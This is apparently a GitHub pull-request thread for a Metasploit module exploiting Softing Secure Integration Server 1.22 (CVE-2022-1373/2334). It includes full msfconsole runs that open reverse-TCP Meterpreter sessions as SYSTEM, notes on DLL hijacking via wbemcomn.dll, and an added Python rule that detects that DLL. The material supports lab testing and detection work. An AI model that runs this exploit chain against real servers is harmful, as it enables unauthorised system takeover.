Open ide0x90 opened 2 months ago
@ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?
Yes, please send the link to msfdev@metasploit.com
Shared the installer
Got it; thanks!
Hi there; I've hit a few snags, but I think I have it mostly working. The only catch is that I get an error message when it tries to restore the configuration, reporting "Not available in current system state".
Is there something I need to do to finish setting up the target?
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.111:8099 - Found Softing Secure Integration Server 1.22.0.8686
[*] 16b85d3ea1537a32b0e4e86800fa074d
[+] 10.5.132.111:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] 10.5.132.111:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_1036106ee02065ab4c967afd43893333.zip
[-] 10.5.132.111:8099 - {"Message"=>"Not available in current system state."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.111:8099 - Returned code 400, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) >
Darn, I forgot about that error - it's a tricky one that needs a workaround. I sent more stuff to msfdev@metasploit.com with additional info.
Hey, looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?
The patch is to get around the "Not available in current system state" error. I wasn't able to get the "Restore Configuration" functionality working without it.
I guess the question is that this patch is likely not in a production environment, so would this exploit work in a production environment without the patch? If this is a binary bypass to a setting like a paid subscription or an activation tier, that would make sense, but I'm just curious what setting this patch emulates.
This patch changes a single byte to bypass the "Not available in current system state" error. I think this error happens because the trial version was used, but I have no way to prove that, or to confirm if it would work in production.
msf6 exploit(windows/http/softing_sis_rce) > show options
Module options (exploit/windows/http/softing_sis_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLPATH no Custom compiled DLL to use
PASSWORD admin no The password to specify for authentication
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 8099 yes The target port (TCP)
SIGNATURE no Use a username/signature pair instead of username/password pair to authenticate
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin no The username to specify for authentication.
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/softing_sis_rce) > set rhosts 10.5.132.252
rhosts => 10.5.132.252
msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49703) at 2024-06-10 20:18:58 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
meterpreter > sysinfo
Computer : WIN-JGPU2LIT1DJ
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
For what it is worth, I was able to get the exploit to work on our default DLL payload, but it did pop an error. Is there a reason to use a custom payload to circumvent this error? I can still interact with the server. There are decided advantages to using the default payload and not having to maintain something new.
msf6 exploit(windows/http/softing_sis_rce) > show options
Module options (exploit/windows/http/softing_sis_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLPATH no Custom compiled DLL to use
PASSWORD admin no The password to specify for authentication
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.132.252 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 8099 yes The target port (TCP)
SIGNATURE no Use a username/signature pair instead of username/password pair to authenticate
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin no The username to specify for authentication.
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[-] 10.5.132.252:8099 - {"ErrorIdentifier"=>"errIdInternalError", "Message"=>"Internal error."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.252:8099 - Returned code 500, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) > [*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49728) at 2024-06-11 08:18:35 -0500
msf6 exploit(windows/http/softing_sis_rce) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN-JGPU2LIT1DJ
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
The reason I used a custom DLL was because a default msfvenom DLL would get loaded by the Softing process during restore, but the shell wouldn't pop. I got around that by compiling the DLL with a def file which has the correct exports so it gets loaded properly, but this causes 18 short-lived shells to spawn and the process to crash. I took inspiration from the code written for https://github.com/rapid7/metasploit-framework/pull/9041/files to work around that.
I couldn't get the cleanup to work properly. If the exploit has been executed successfully before, it will fail in subsequent runs because the existing wbemcomn.dll won't be overwritten. This will result in the "Internal Error" message. This also leads to new shells because the existing wbemcomn.dll gets loaded again during the subsequent exploit attempts.
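The thread above describes the artifact this module leaves behind: a wbemcomn.dll that the Softing process loads during configuration restore and again on every later attempt. The following is an added detection example, not code from the PR or from Metasploit: it scans constructed Sysmon-style image-load records and flags any load of wbemcomn.dll that is not Microsoft-signed. The Softing process name and the hash values are placeholders, not values from the page.

```python
import re
from typing import Dict, List

# Constructed sample records in a Sysmon Event ID 7 (ImageLoad) key=value style.
# These are not real telemetry; the Softing executable name and hashes are placeholders.
SAMPLE_LOG = """\
EventID=7 Image=C:\\Windows\\System32\\svchost.exe ImageLoaded=C:\\Windows\\System32\\wbem\\wbemcomn.dll Signed=true Signature="Microsoft Windows" Hashes=SHA256=PLACEHOLDER_GOOD
EventID=7 Image="C:\\Program Files\\Softing\\sis_placeholder.exe" ImageLoaded=C:\\Windows\\System32\\wbem\\wbemcomn.dll Signed=false Signature="-" Hashes=SHA256=PLACEHOLDER_BAD
EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c whoami"
EventID=7 Image="C:\\Program Files\\Softing\\sis_placeholder.exe" ImageLoaded=C:\\Windows\\System32\\wbem\\wbemcomn.dll Signed=true Signature="Microsoft Windows" Hashes=SHA256=PLACEHOLDER_GOOD
"""

# key=value pairs; a value is either a double-quoted string or a run of non-space characters
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line: str) -> Dict[str, str]:
    """Parse one key=value record into a dict, stripping surrounding quotes from values."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def is_suspicious_wbemcomn_load(rec: Dict[str, str]) -> bool:
    """True when an ImageLoad event loads wbemcomn.dll that is not signed by Microsoft."""
    if rec.get("EventID") != "7":
        return False
    loaded = rec.get("ImageLoaded", "").lower()
    if not loaded.endswith("\\wbemcomn.dll"):
        return False
    signed_by_microsoft = (
        rec.get("Signed", "").lower() == "true"
        and "microsoft" in rec.get("Signature", "").lower()
    )
    return not signed_by_microsoft


def find_suspicious_loads(log_text: str) -> List[Dict[str, str]]:
    """Return loader process, DLL path and hashes for every suspicious wbemcomn.dll load."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if is_suspicious_wbemcomn_load(rec):
            hits.append({
                "process": rec.get("Image", ""),
                "dll": rec.get("ImageLoaded", ""),
                "hashes": rec.get("Hashes", ""),
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_loads(SAMPLE_LOG):
        print(f"suspicious load: {hit['process']} loaded {hit['dll']} ({hit['hashes']})")
```

Because the dropped DLL stays on disk and is reloaded on each subsequent attempt, the same rule fires once per restore, which is also a usable signal for the repeated short-lived processes the author describes.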
This PR adds a module and related materials for the CVE-2022-1373 and CVE-2022-2334 exploit chain against Softing Secure Integration Server 1.22 that was used during Pwn2Own 2022 Miami. This is dependent on https://github.com/rapid7/metasploit-framework/pull/19075.
Verification
List the steps needed to make sure this thing works
- msfconsole
- use exploit/windows/http/softing_sis_rce
- set RHOSTS <target_ip>
- set SSL true if necessary
- set RPORT <target_port> if SSL is set
- set USERNAME <username> if necessary. Default is admin
- set PASSWORD <password> if necessary. Default is admin
- set SIGNATURE <signature> to use signature authentication. PASSWORD will be ignored if SIGNATURE is set!
- set DLLPATH <path_to_custom_dll> to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
- exploit and get a shell
- C:\\Windows\\System32\\wbem\\wbemcomn.dll
Vulnerable Software
Softing Secure Integration Server 1.22
This version is no longer available for download on the vendor's page, but I have a copy of the installer that I can provide.
Test Environment
Windows Server 2019 Standard x64.
Test run
TODO: session.fs.file.rm doesn't.